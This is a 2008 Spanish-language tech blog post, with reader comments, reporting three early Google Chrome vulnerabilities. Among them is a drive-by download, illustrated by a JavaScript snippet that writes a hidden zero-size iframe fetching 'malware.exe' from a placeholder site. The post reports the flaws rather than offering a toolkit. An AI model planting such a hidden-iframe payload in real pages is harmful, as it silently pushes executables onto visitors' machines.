Geek the Planet


Seguridad no image

Published on septiembre 4th, 2008 | by Angelfire

3

3 vulnerabilidades en google chrome y contando

De estas 3 vulnerabilidades me entero gracias a Dragon.

  1. Vulnerable a carpet bombing, una vulnerabilidad descubierta por el investigador Aviv Raff en el motor web opensource Webkit (Base del navegador Google Chrome y Safari) que permite descargar automáticamente archivos cuando el usuario navega por una página maliciosa.
  2. Fallo en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de pestañas independientes de este navegador.
  3. Consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.
    
    <script>
    document.write('<iframe src="http://tusitio.com/malware.exe" frameborder="0" width="0" height="0">');
    </script>
    

Creo que 3 vulnerabilidades son más que suficientes para demostrar que de momento google Chrome es un desastre absoluto.

Leer Más: Vulnerabilidades en Google Chrome (I)
Vulnerabilidades en Google Chrome (II)
Vulnerabilidades en Google Chrome (III)

Tags: , ,


About the Author

Systems Engineering, Computer Systems Specialist, Social Engineering Specialist. Social Media Analyzer. Usability and SEO enthusiasm (Este es mi perfil de Twitter...)



3 Responses to 3 vulnerabilidades en google chrome y contando

  1. pendiolo says:

    Que parte de BETA http://www.google.com/chrome de esta parte no se lee, aunque google siempre nos acostumbra con sus productos betas, en todo caso, aun no me convence y sigo con FF pero que chrome es BETA y tiene ideas muy innovadoras!

  2. Angelfire says:

    No entiendo su comentario, que tiene que ver con mi post? acaso estoy diciendo que google chrome tenia que ser perfecto? solamente estoy informando sobre las multiples vulnerabilidades del navegador.

  3. Guaguau says:

    La verdad me gusta que sea de google pero no parece un producto de google creo que lo sacaron de afan para luchar contra el IE 8

Back to Top ↑